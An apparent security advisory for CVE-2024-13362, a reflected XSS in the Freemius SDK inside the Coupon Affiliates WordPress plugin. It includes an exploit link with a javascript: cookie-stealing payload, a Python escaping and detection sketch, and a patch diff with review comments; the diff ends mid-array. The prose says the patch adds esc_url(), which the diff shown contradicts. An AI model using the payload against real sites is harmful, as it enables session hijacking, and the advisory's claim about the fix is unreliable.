Atomic Edge analysis of CVE-2024-13362: A reflected DOM-based Cross-Site Scripting (XSS) vulnerability exists in the Freemius SDK library, version 2.10.1 and earlier, which is bundled with multiple WordPress plugins and themes. An unauthenticated attacker can inject arbitrary web scripts via the ‘url’ parameter. This vulnerability requires user interaction, such as clicking a crafted link. The CVSS score is 6.1 (Medium).
The root cause is insufficient input sanitization and output escaping in the Freemius SDK’s handling of the ‘trial_promotion_message’ filter. In the vulnerable file `woo-coupon-usage/freemius/includes/class-freemius.php`, around line 24000, the code constructs an admin notice message by directly concatenating a user-supplied URL with HTML markup. The `$trial_url` variable is passed into a `sprintf` format string without escaping the URL context. The `$this->apply_filters( ‘trial_promotion_message’, …)` call then passes this unsanitized HTML to the `_admin_notices->add_sticky()` method, which injects it into the DOM. The fix ensures the entire message block, including the button, is wrapped in a `
An attacker can craft a malicious URL that, when visited by a logged-in administrator, injects JavaScript into the WordPress admin dashboard. The payload is embedded in the `url` parameter that is processed by the Freemius trial promotion notice. For example, a link pointing to `https://target.com/wp-admin/admin.php?page=wcusage_…&url=javascript:alert(document.cookie)` would cause the Freemius SDK to render a sticky admin notice containing the attacker’s script. The script executes in the context of the admin page, giving the attacker access to session cookies and administrative functions.
The patch modifies the code to properly escape the URL before it is inserted into the HTML. In the patched version, the `$trial_url` is passed through `esc_url()` within the `sprintf()` call. Additionally, the HTML structure is refactored to use a `
If exploited, this vulnerability allows an attacker to execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This can lead to session hijacking, credential theft, forced administrative actions (e.g., adding new admin users), and complete compromise of the WordPress site. The attacker needs no account on the site; the only requirement is that the victim is logged in as an administrator when they click the malicious link.
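As an added example (not code from the Freemius SDK or the Coupon Affiliates plugin), the following Python models why a scheme-filtering escaper in the style of WordPress `esc_url()`, and not HTML escaping, is the right tool for a `url` value that lands in an href, and reuses the same check as a detection helper over request query strings. `esc_url_like()` is a simplified stand-in for `esc_url()`, and `ALLOWED_SCHEMES`, `EXAMPLE_ADMIN_PAGE` and the sample query strings are constructed assumptions.

```python
"""URL-context escaping for the `url` value that ends up in the trial button's
href, plus the same scheme check reused as a log/WAF detection helper.

Added example, not code from the Freemius SDK or the Coupon Affiliates plugin.
esc_url_like() is a simplified stand-in for WordPress esc_url(); the allowed
scheme list and the sample query strings are constructed for this example.
"""
from html import escape
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumption: a trial link only ever needs http(s). WordPress esc_url() defaults
# to the longer wp_allowed_protocols() list, but javascript: is in neither.
ALLOWED_SCHEMES = {"http", "https"}


def clean_and_scheme(url: str) -> Tuple[str, str]:
    """Return (cleaned_url, lowercase scheme or "").

    Whitespace and control characters are dropped first because browsers
    ignore them inside a scheme, so "java<tab>script:" must still be caught.
    """
    cleaned = "".join(ch for ch in url.strip()
                      if ch.isprintable() and not ch.isspace())
    return cleaned, urlsplit(cleaned).scheme.lower()


def esc_url_like(url: str) -> str:
    """Model of the esc_url() property the fix depends on: a URL with a
    disallowed scheme is rejected outright (returned as ""), not entity
    encoded; what survives is escaped for use inside a quoted attribute."""
    cleaned, scheme = clean_and_scheme(url)
    if scheme and scheme not in ALLOWED_SCHEMES:
        return ""
    return escape(cleaned, quote=True)


def html_escape_only(url: str) -> str:
    """The wrong escaper for an href: entity-encodes <, >, &, quotes and nothing
    else, so a javascript: URL comes back unchanged."""
    return escape(url, quote=True)


def render_button_vulnerable(trial_url: str, label: str) -> str:
    """The pattern described in the advisory: the URL is formatted straight
    into href="%s" with no URL-context escaping."""
    return ('<a style="margin-left: 10px;" href="%s">'
            '<button class="button button-primary">%s</button></a>') % (trial_url, label)


def render_button_fixed(trial_url: str, label: str) -> str:
    """Hardened form: scheme-filtering escaper on the href, HTML escaper on
    the label; the two output contexts get two different escapers."""
    return '<div><a class="button button-primary" href="%s">%s</a></div>' % (
        esc_url_like(trial_url), escape(label, quote=True))


# Constructed query strings (not captured traffic) in the shape the advisory
# describes: an admin page request whose `url` parameter carries the link.
# EXAMPLE_ADMIN_PAGE is a placeholder for the real page slug.
SAMPLE_QUERIES = [
    "page=EXAMPLE_ADMIN_PAGE&url=https%3A%2F%2Fexample.com%2Ftrial%3Fplan%3D1",
    "page=EXAMPLE_ADMIN_PAGE&url=javascript%3Aalert(document.cookie)",
    "page=EXAMPLE_ADMIN_PAGE&url=%09JaVaScRiPt%3Aalert(1)",
]


def flag_query(query: str) -> bool:
    """Detection helper: True when any `url` parameter in the query string
    carries a scheme outside ALLOWED_SCHEMES. parse_qs() percent-decodes the
    value first, so encoded tabs and colons are seen as the browser would."""
    for value in parse_qs(query, keep_blank_values=True).get("url", []):
        _, scheme = clean_and_scheme(value)
        if scheme and scheme not in ALLOWED_SCHEMES:
            return True
    return False


def flagged_queries(queries: List[str] = SAMPLE_QUERIES) -> List[str]:
    """Run the detection over a batch of query strings (e.g. parsed from
    access logs) and return the ones worth investigating."""
    return [q for q in queries if flag_query(q)]


if __name__ == "__main__":
    payload = "javascript:alert(document.cookie)"
    print("HTML escape leaves scheme:", html_escape_only(payload))
    print("vulnerable :", render_button_vulnerable(payload, "Start free trial"))
    print("fixed      :", render_button_fixed(payload, "Start free trial"))
    print("flagged    :", flagged_queries())
```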
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/woo-coupon-usage/freemius/includes/class-freemius.php
+++ b/woo-coupon-usage/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@
// Start trial button.
$button = ' ' . sprintf(
- '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s ➜</button></a>',
+ '<div><a class="button button-primary" href="%s">%s ➜</a></div>',
$trial_url,
$this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
);
+ $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
$this->_admin_notices->add_sticky(
- $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+ "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
'trial_promotion',
'',
'promotion'
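Review bot: `$trial_url` is still passed into the `href="%s"` format at the `$trial_url,` line without `esc_url()`, so this hunk does not escape the href context itself; it only moves the button outside the `trial_promotion_message` filter output. Wrap it as `esc_url( $trial_url )`. Also, as displayed, the inner double quotes in `"<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>"` would terminate the PHP string; if the backslashes were lost in rendering that is fine, otherwise they need escaping or the string should use single quotes with concatenation.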
@@ -25476,7 +25478,7 @@
$img_dir = WP_FS__DIR_IMG;
// Locate the main assets folder.
- if ( 1 < count( $fs_active_plugins->plugins ) ) {
+ if ( ! empty( $fs_active_plugins->plugins ) ) {
$plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );
foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/woo-coupon-usage/freemius/includes/class-fs-plugin-updater.php
+++ b/woo-coupon-usage/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@
global $wp_current_filter;
- $current_plugin_version = $this->_fs->get_plugin_version();
-
- if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
- if (
- is_null( $this->_update_details ) ||
- ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
- ) {
- /**
- * After an update, clear the stored update details and reparse the plugin's main file in order to get
- * the updated version's information and prevent the previous update information from showing up on the
- * updates page.
- *
- * @author Leo Fajardo (@leorw)
- * @since 2.3.1
- */
- $this->_update_details = null;
- $current_plugin_version = $this->_fs->get_plugin_version( true );
- }
+ if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+ return $transient_data;
}
if ( ! isset( $this->_update_details ) ) {
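Review bot: the early `return $transient_data;` in the new `upgrader_process_complete` branch leaves `$this->_update_details` untouched rather than clearing it as the removed block did, so update details captured before the upgrade may persist until the next check; please confirm that is intended. `in_array( 'upgrader_process_complete', $wp_current_filter )` should also pass `true` as the third argument for a strict comparison.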
@@ -568,7 +552,7 @@
false,
fs_request_get_bool( 'force-check' ),
FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
- $current_plugin_version
+ $this->_fs->get_plugin_version()
);
$this->_update_details = false;
--- a/woo-coupon-usage/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/woo-coupon-usage/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
/**
* Class FS_Plugin_Plan
*
- * @property FS_Pricing[] $pricing
*/
class FS_Plugin_Plan extends FS_Entity {
--- a/woo-coupon-usage/freemius/includes/entities/class-fs-site.php
+++ b/woo-coupon-usage/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
exit;
}
- /**
- * @property int $blog_id
- */
- #[AllowDynamicProperties]
class FS_Site extends FS_Scope_Entity {
/**
* @var number
*/
public $site_id;
/**
+ * @var int
+ */
+ public $blog_id;
+ /**
* @var number
*/
public $plugin_id;
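Review bot: dropping `#[AllowDynamicProperties]` from `FS_Site` means any other property still assigned dynamically on this entity will raise a PHP 8.2 deprecation; declaring `$blog_id` covers only that one. Worth grepping for other undeclared assignments on `FS_Site` before merging.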
--- a/woo-coupon-usage/freemius/includes/entities/class-fs-user.php
+++ b/woo-coupon-usage/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
parent::__construct( $user );
}
+ /**
+ * This method removes the deprecated 'is_beta' property from the serialized data.
+ * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+ *
+ * @return void
+ */
+ function __wakeup() {
+ if ( property_exists( $this, 'is_beta' ) ) {
+ // If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+ unset( $this->is_beta );
+ }
+ }
+
function get_name() {
return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
}
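Review bot: the `__wakeup()` cleanup runs after PHP has already restored `is_beta` as a dynamic property, so the PHP 8.2 deprecation is still emitted on the first load (as the inline comment admits). Implementing `__unserialize( array $data )` instead lets the class drop the `is_beta` key before any property is assigned, avoiding the warning entirely; the new method should also carry an explicit `public` visibility.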
--- a/woo-coupon-usage/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/woo-coupon-usage/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
$menu = $this->find_main_submenu();
}
+ $menu_slug = $menu['menu'][2];
$parent_slug = isset( $menu['parent_slug'] ) ?
- $menu['parent_slug'] :
- 'admin.php';
+ $menu['parent_slug'] :
+ 'admin.php';
- return admin_url(
- $parent_slug .
- ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
- 'page=' .
- $menu['menu'][2]
- );
+ if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+ $parent_slug = 'admin.php';
+
+ /**
+ * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+ *
+ * @author Leo Fajardo (@leorw)
+ * @since 2.10.2
+ */
+ global $_parent_pages;
+
+ if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+ $_parent_slug = $_parent_pages[ $menu_slug ];
+ $parent_slug = isset( $_parent_pages[ $_parent_slug ] ) ?
+ $parent_slug :
+ $menu['parent_slug'];
+ }
+ }
+
+ return admin_url(
+ $parent_slug .
+ ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+ 'page=' .
+ $menu_slug
+ );
}
/**
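Review bot: inside the new `enable_cpt_advanced_menu_logic` block, `$menu['parent_slug']` is read without the `isset()` guard that the ternary above applies, so a menu without `parent_slug` produces an undefined-index notice and an empty parent here. Reuse the guarded value or add the same `isset()` check. The intent of `isset( $_parent_pages[ $_parent_slug ] ) ? $parent_slug : $menu['parent_slug']` also deserves a comment, since `$parent_slug` was just forced to `'admin.php'` a few lines earlier.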
--- a/woo-coupon-usage/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/woo-coupon-usage/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
* @since 1.0.7
*/
static function _add_sticky_dismiss_javascript() {
+ $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+ if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+ return;
+ }
+
$params = array();
- fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+ fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
}
private static $_added_sticky_javascript = false;
--- a/woo-coupon-usage/freemius/start.php
+++ b/woo-coupon-usage/freemius/start.php
@@ -15,7 +15,7 @@
*
* @var string
*/
- $this_sdk_version = '2.10.1';
+ $this_sdk_version = '2.11.0';
#region SDK Selection Logic --------------------------------------------------------------------
--- a/woo-coupon-usage/inc/admin/admin-affiliate-users.php
+++ b/woo-coupon-usage/inc/admin/admin-affiliate-users.php
@@ -165,7 +165,11 @@
if ($user_info) {
// Get current page after /wp-admin/ without parameters
- $current_page = sanitize_text_field($_GET['page']);
+ if(isset($_GET['page'])) {
+ $current_page = sanitize_text_field($_GET['page']);
+ } else {
+ $current_page = '';
+ }
$unlink_url = add_query_arg(
array(
'action' => 'wcusage_unlink_affiliate',
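Review bot: `sanitize_text_field( $_GET['page'] )` should be `sanitize_text_field( wp_unslash( $_GET['page'] ) )` per WordPress coding standards, and since this is a page slug `sanitize_key()` is the tighter choice. The `isset()` guard is the right fix; a ternary would keep it to one line.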
--- a/woo-coupon-usage/inc/admin/admin-dashboard.php
+++ b/woo-coupon-usage/inc/admin/admin-dashboard.php
@@ -411,6 +411,9 @@
$name = $user->user_login;
}
}
+ if(!$name || $name == "" || $name == " ") {
+ $name = $user->user_login;
+ }
?>
<tr class="wcusage-admin-table-col-row">
<td><a href="<?php echo esc_url(get_edit_user_link($user_id)); ?>" title="<?php echo esc_html($user->user_login); ?>" target="_blank"><?php echo esc_html($name); ?></a></td>
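Review bot: `!$name` already covers `""`, so the extra `$name == ""` comparison is redundant, and `$name == " "` misses other whitespace-only names; `trim( (string) $name ) === ''` expresses the intent in one check.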
--- a/woo-coupon-usage/inc/admin/admin-orders-box.php
+++ b/woo-coupon-usage/inc/admin/admin-orders-box.php
@@ -3,30 +3,27 @@
if ( !defined( 'ABSPATH' ) ) {
exit;
}
-if ( !class_exists( 'SitePress' ) ) {
- // Temp fix for WPML conflict
- function wcusage_add_custom_box() {
- if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
- $screen = wc_get_page_screen_id( 'shop-order' );
- } else {
- $screen = 'shop_order';
- }
- add_meta_box(
- 'wcusage_affiliate_info',
- // Unique ID
- 'Coupon Affiliate',
- // Box title
- 'wcusage_custom_box_html',
- // Content callback, must be of type callable
- $screen,
- // Post type
- 'side',
- 'high'
- );
+function wcusage_add_custom_box() {
+ if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
+ $screen = wc_get_page_screen_id( 'shop-order' );
+ } else {
+ $screen = 'shop_order';
}
-
- add_action( 'add_meta_boxes', 'wcusage_add_custom_box' );
+ add_meta_box(
+ 'wcusage_affiliate_info',
+ // Unique ID
+ 'Coupon Affiliate',
+ // Box title
+ 'wcusage_custom_box_html',
+ // Content callback, must be of type callable
+ $screen,
+ // Post type
+ 'side',
+ 'high'
+ );
}
+
+add_action( 'add_meta_boxes', 'wcusage_add_custom_box' );
// Display the metabox content
function wcusage_custom_box_html( $post ) {
$options = get_option( 'wcusage_options' );
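Review bot: the `class_exists( 'SitePress' )` guard and the `// Temp fix for WPML conflict` comment are removed without a replacement, so the meta box is now registered on WPML sites too; the commit message should state what resolved the conflict, or the guard should stay until that is confirmed.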
@@ -44,7 +41,7 @@
}
$order = wc_get_order( $post_id );
if ( $order ) {
- if ( $wcusage_show_column_code && !class_exists( 'SitePress' ) ) {
+ if ( $wcusage_show_column_code ) {
$affiliate = array();
$coupon_codes = array();
$lifetimeaffiliate = wcusage_order_meta( $post_id, 'lifetime_affiliate_coupon_referrer' );
@@ -173,12 +170,21 @@
echo '<strong>(' . esc_html__( 'Custom / URL Referral', 'woo-coupon-usage' ) . ')</strong><br/>';
}
$ispaid = "";
- // Message
- echo 'Referral Code: ' . esc_html( $coupon_code ) . '<br/>';
- echo wp_kses_post( $getinfo['affililiateusertext'] );
+ // Show the coupon code
+ if ( isset( $coupon_id ) && $coupon_id ) {
+ echo 'Referral Code: <a href="' . esc_url( admin_url( 'post.php?post=' . esc_attr( $coupon_id ) . '&action=edit' ) ) . '" target="_blank" style="color: #07bbe3;">' . esc_html( $coupon_code ) . '</a><br/>';
+ }
+ // Show the affiliate user
+ $wcusage_affiliate_user = wcusage_order_meta( $order_id, 'wcusage_affiliate_user' );
+ if ( $wcusage_affiliate_user ) {
+ $affiliate = get_user_by( 'ID', $wcusage_affiliate_user );
+ $affiliate_username = $affiliate->user_login;
+ echo esc_html__( 'Affiliate User', 'woo-coupon-usage' ) . ": <a href='" . esc_url( admin_url( "user-edit.php?user_id=" . $wcusage_affiliate_user ) ) . "' target='_blank' style='color: #07bbe3;'>" . esc_html( $affiliate_username ) . "</a><br/>";
+ }
if ( $order->get_status() != "refunded" && !wcusage_coupon_disable_commission( $coupon_id ) ) {
echo esc_html__( 'Commission', 'woo-coupon-usage' ) . ": " . wp_kses_post( $getinfo['thecommission'] ) . wp_kses_post( $ispaid ) . "<br/>";
}
+ // Show the affiliate dashboard link
echo "<a href='" . esc_url( $getinfo['uniqueurl'] ) . "' target='_blank' style='color: #07bbe3;' title='" . esc_html__( 'View the affiliate dashboard for this affiliate coupon.', 'woo-coupon-usage' ) . "'>" . esc_html__( 'View Dashboard', 'woo-coupon-usage' ) . "</a>";
echo "</p>";
$wcusage_field_mla_enable = wcusage_get_setting_value( 'wcusage_field_mla_enable', '0' );
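Review bot: `get_user_by( 'ID', $wcusage_affiliate_user )` returns `false` for a deleted or invalid user ID, and `$affiliate->user_login` on the next line would then throw on PHP 8; guard with `if ( $affiliate instanceof WP_User )`. Casting `$wcusage_affiliate_user` with `(int)` before building the `user-edit.php?user_id=` URL also keeps non-numeric meta out of the link.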
--- a/woo-coupon-usage/inc/admin/admin-tools.php
+++ b/woo-coupon-usage/inc/admin/admin-tools.php
@@ -8,10 +8,10 @@
<div class="wrap admin-tools" style="margin: 0;">
- <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
-
<div class="wrap">
+ <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
+
<h1>Coupon Affiliates - Admin Tools</h1>
<br/>
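Review bot: `do_action()` returns nothing, so `<?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>` should be `<?php do_action( 'wcusage_hook_dashboard_page_header', '' ); ?>`; the same pattern is repeated in the other moved header lines in this patch.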
--- a/woo-coupon-usage/inc/admin/class-clicks-list-table.php
+++ b/woo-coupon-usage/inc/admin/class-clicks-list-table.php
@@ -37,11 +37,11 @@
if (isset($item[$column_name]) && $item[$column_name] != 0) {
$coupon_info = wcusage_get_coupon_info_by_id($item[$column_name]);
$uniqueurl = $coupon_info[4];
- return "<a href='" . $uniqueurl . "' target='_blank' title='" . __('View Affiliate Dashboard', 'woo-coupon-usage') . "'>"
+ return "<a href='" . esc_url($uniqueurl) . "' target='_blank' title='" . __('View Affiliate Dashboard', 'woo-coupon-usage') . "'>"
. get_the_title($item[$column_name])
- . "</a> <a href='" . admin_url('post.php?post=' . $item[$column_name] . '&action=edit&classic-editor') . "' target='_blank' title='" . __('Edit Coupon', 'woo-coupon-usage') . "'>"
+ . "</a> <a href='" . esc_url(admin_url('post.php?post=' . $item[$column_name] . '&action=edit&classic-editor')) . "' target='_blank' title='" . __('Edit Coupon', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-edit-page' style='font-size: 12px; margin-top: 5px; display: inline-block; width: 12px;'></span></a>"
- . "<a href='" . admin_url('admin.php?page=wcusage_clicks&coupon=' . get_the_title($item[$column_name])) . "' title='" . __('View all visits for this coupon.', 'woo-coupon-usage') . "'>"
+ . "<a href='" . esc_url(admin_url('admin.php?page=wcusage_clicks&coupon=' . get_the_title($item[$column_name]))) . "' title='" . __('View all visits for this coupon.', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-search' style='font-size: 12px; margin-top: 5px;'></span></a>";
} else {
return "";
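Review bot: the hrefs now go through `esc_url()`, but `get_the_title($item[$column_name])` is still concatenated into the link text unescaped, and the `title='...'` attributes use `__()` where `esc_attr__()` is the right function. Wrap the title in `esc_html()` and switch the attribute strings to `esc_attr__()`.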
@@ -49,14 +49,14 @@
case 'campaign':
if (!empty($item[$column_name])) {
return ucfirst($item[$column_name])
- . "<a href='" . admin_url('admin.php?page=wcusage_clicks&campaign=' . $item[$column_name]) . "' title='" . __('View all visits for this campaign name.', 'woo-coupon-usage') . "'>"
+ . "<a href='" . esc_url(admin_url('admin.php?page=wcusage_clicks&campaign=' . $item[$column_name])) . "' title='" . __('View all visits for this campaign name.', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-search' style='font-size: 12px; margin-top: 5px;'></span></a>";
} else {
return "---";
}
case 'page':
if(isset($item[$column_name])) {
- return "<a href='".get_permalink($item[$column_name])."' target='_blank' title='".__( 'View Landing Page', 'woo-coupon-usage' )."'>"
+ return "<a href='".esc_url(get_permalink($item[$column_name]))."' target='_blank' title='".__( 'View Landing Page', 'woo-coupon-usage' )."'>"
. get_the_title($item[$column_name]) . "</a>";
} else {
return "";
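Review bot: `ucfirst($item[$column_name])` in the `campaign` case is returned to the page unescaped even though its href was just wrapped in `esc_url()`; wrap it in `esc_html()`. The campaign value is also concatenated straight into the query string; `rawurlencode()` (or `add_query_arg()`) before `admin_url()` keeps an `&` or `#` in a campaign name from breaking the link.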
@@ -64,7 +64,7 @@
case 'referrer':
if (!empty($item[$column_name])) {
return $item[$column_name]
- . "<a href='".admin_url('admin.php?page=wcusage_clicks&referrer=' . $item[$column_name])."' title='" . __('View all visits for this referrer.', 'woo-coupon-usage') . "'>"
+ . "<a href='".esc_url(admin_url('admin.php?page=wcusage_clicks&referrer=' . $item[$column_name]))."' title='" . __('View all visits for this referrer.', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-search' style='font-size: 12px; margin-top: 5px;'></span></a>";
} else {
return "";
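Review bot: `return $item[$column_name]` in the `referrer` case emits the stored referrer into the table unescaped; `esc_url()` on the link href does not protect this text node. Use `esc_html($item[$column_name])`, and `rawurlencode()` the value before appending it to the `wcusage_clicks&referrer=` query.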
--- a/woo-coupon-usage/inc/admin/class-coupon-users-table.php
+++ b/woo-coupon-usage/inc/admin/class-coupon-users-table.php
@@ -263,7 +263,7 @@
$coupons = wcusage_get_users_coupons_ids( $user_id );
switch ( $column_name ) {
case 'ID':
- return '<a href="' . admin_url( 'user-edit.php?user_id=' . $user_id ) . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $item[ $column_name ] . '</a>';
+ return '<a href="' . esc_url(admin_url( 'user-edit.php?user_id=' . $user_id )) . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $item[ $column_name ] . '</a>';
case 'Username':
return wcusage_output_affiliate_tooltip_user_info($user_id);
case 'roles':
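Review bot: `$item[ $column_name ]` is still concatenated into the link text unescaped in the `ID` case; `esc_html()` it alongside the new `esc_url()`, and cast `$user_id` with `(int)` in the `user-edit.php?user_id=` URL.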
@@ -382,7 +382,7 @@
<style>@media screen and (min-width: 782px) { .wcusage_users_page_desc { margin-bottom: -40px; } }</style>
<div class="wrap wcusage_users_page_header">
- <h2 class="wcusage-admin-title">
+ <h2 class="wp-heading-inline wcusage-admin-title">
<?php echo esc_html__('Coupon Affiliate Users', 'woo-coupon-usage'); ?>
<span class="wcusage-admin-title-buttons">
<a href="<?php echo esc_url(admin_url('admin.php?page=wcusage_add_affiliate')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Add New Affiliate</a>
--- a/woo-coupon-usage/inc/admin/class-coupons-table.php
+++ b/woo-coupon-usage/inc/admin/class-coupons-table.php
@@ -136,12 +136,11 @@
switch ($column_name) {
case 'ID':
- // return '<a href="' . admin_url('post.php?post=' . $item[$column_name] . '&action=edit') . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $item[$column_name] . '</a>';
$coupon_id = $item->ID;
- return '<a href="' . admin_url('post.php?post=' . $coupon_id . '&action=edit') . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $coupon_id . '</a>';
+ return '<a href="' . esc_url(admin_url('post.php?post=' . $coupon_id . '&action=edit')) . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . esc_html($coupon_id) . '</a>';
case 'post_title':
$coupon_id = $item->ID;
- return '<a href="' . admin_url('post.php?post=' . $coupon_id . '&action=edit') . '">' . $coupon_code . '</a>';
+ return '<a href="' . esc_url(admin_url('post.php?post=' . $coupon_id . '&action=edit')) . '">' . esc_html($coupon_code) . '</a>';
case 'coupon_type':
$coupon_type = get_post_meta($item->ID, 'discount_type', true);
if(!$coupon_type) {
@@ -154,31 +153,31 @@
}
if($coupon_type == 'percent') {
if($coupon_amount) {
- return esc_html__('Percentage Discount', 'woo-coupon-usage') . ' (' . $coupon_amount . '%)';
+ return esc_html__('Percentage Discount', 'woo-coupon-usage') . ' (' . esc_html($coupon_amount) . '%)';
} else {
return esc_html__('Percentage Discount', 'woo-coupon-usage');
}
} elseif($coupon_type == 'fixed_cart') {
if($coupon_amount) {
- return esc_html__('Fixed Cart Discount', 'woo-coupon-usage') . ' (' . wc_price($coupon_amount) . ')';
+ return esc_html__('Fixed Cart Discount', 'woo-coupon-usage') . ' (' . wc_price(esc_html($coupon_amount)) . ')';
} else {
return esc_html__('Fixed Cart Discount', 'woo-coupon-usage');
}
} elseif($coupon_type == 'fixed_product') {
if($coupon_amount) {
- return esc_html__('Fixed Product Discount', 'woo-coupon-usage') . ' (' . wc_price($coupon_amount) . ')';
+ return esc_html__('Fixed Product Discount', 'woo-coupon-usage') . ' (' . wc_price(esc_html($coupon_amount)) . ')';
} else {
return esc_html__('Fixed Product Discount', 'woo-coupon-usage');
}
} elseif($coupon_type == 'percent_product') {
if($coupon_amount) {
- return esc_html__('Percentage Product Discount', 'woo-coupon-usage') . ' (' . $coupon_amount . '%)';
+ return esc_html__('Percentage Product Discount', 'woo-coupon-usage') . ' (' . esc_html($coupon_amount) . '%)';
} else {
return esc_html__('Percentage Product Discount', 'woo-coupon-usage');
}
}
if($coupon_amount) {
- return $coupon_type . ' (' . $coupon_amount . ')';
+ return $coupon_type . ' (' . esc_html($coupon_amount) . ')';
} else {
return $coupon_type;
}
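Review bot: `wc_price( esc_html( $coupon_amount ) )` applies the escaper in the wrong place: `wc_price()` expects a number and returns HTML, so escaping its input does nothing useful and escaping its output would break the markup. Cast the amount with `(float)` before `wc_price()` and leave the `wc_price()` result as is; the `esc_html( $coupon_amount )` in the plain-text `%` branches is fine.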
@@ -199,7 +198,7 @@
}
}
if($usage > 0 && !$sales) {
- return "<span title='".$qmessage."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
+ return "<span title='".esc_html($qmessage)."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
}
return wcusage_format_price($sales);
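Review bot: the value is going into a `title='...'` attribute, so use `esc_attr($qmessage)` rather than `esc_html($qmessage)`; the trailing `</a>` with no opening tag in this return string is also stray markup.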
case 'commission':
@@ -217,7 +216,7 @@
}
}
if($usage > 0 && !$total_commission) {
- return "<span title='".$qmessage."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
+ return "<span title='".esc_html($qmessage)."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
}
return wcusage_format_price($total_commission);
case 'unpaid_commission':
@@ -236,7 +235,7 @@
if($user_info) {
$username = $user_info->user_login;
$userlink = get_edit_user_link($coupon_user_id);
- $usernametext = '<a href="'.$userlink.'" target="_blank">' . $username . '</a>';
+ $usernametext = '<a href="'.$userlink.'" target="_blank">' . esc_html($username) . '</a>';
} else {
$usernametext = "-";
}
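Review bot: `$username` is now escaped, but `$userlink` from `get_edit_user_link()` is still placed in the href unescaped; wrap it in `esc_url($userlink)` for consistency with the rest of this patch.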
@@ -244,25 +243,52 @@
case 'dashboard_link':
$coupon_info = wcusage_get_coupon_info_by_id($item->ID);
$dashboard_link = $coupon_info[4];
- return '<a href="' . $dashboard_link . '" target="_blank">'.esc_html__('View Dashboard', 'woo-coupon-usage').' <span class="dashicons dashicons-external"></span></a>';
+ return '<a href="' . esc_url($dashboard_link) . '" target="_blank">'.esc_html__('View Dashboard', 'woo-coupon-usage').' <span class="dashicons dashicons-external"></span></a>';
case 'referral_link':
$home_page = get_home_url();
$user_info = get_userdata($coupon_user_id);
$link = $home_page.'?' . $wcusage_urls_prefix . '='.esc_html($coupon_code);
return '<div class="wcusage-copyable-link">'
- . '<input type="text" id="wcusageLink'.$coupon_code.'" class="wcusage-copy-link-text" value="'.$link.'" title="'.$link.'"
+ . '<input type="text" id="wcusageLink'.esc_attr($coupon_code).'" class="wcusage-copy-link-text" value="'.esc_url($link).'" title="'.esc_url($link).'"
style="max-width: 100px;width: 75%;max-height: 24px;min-height: 24px;font-size: 10px;" readonly>'
. '<button type="button" class="wcusage-copy-link-button" style="max-height: 20px;min-height: 20px;background: none;border: none;"
title="'.esc_html__( 'Copy Link', 'woo-coupon-usage' ).'"><i class="fa-regular fa-copy"></i></button>'
. '</div>';
case 'the-actions':
+ $allowed_html = array(
+ 'a' => array(
+ 'href' => array(),
+ 'title' => array(),
+ 'onclick' => array(),
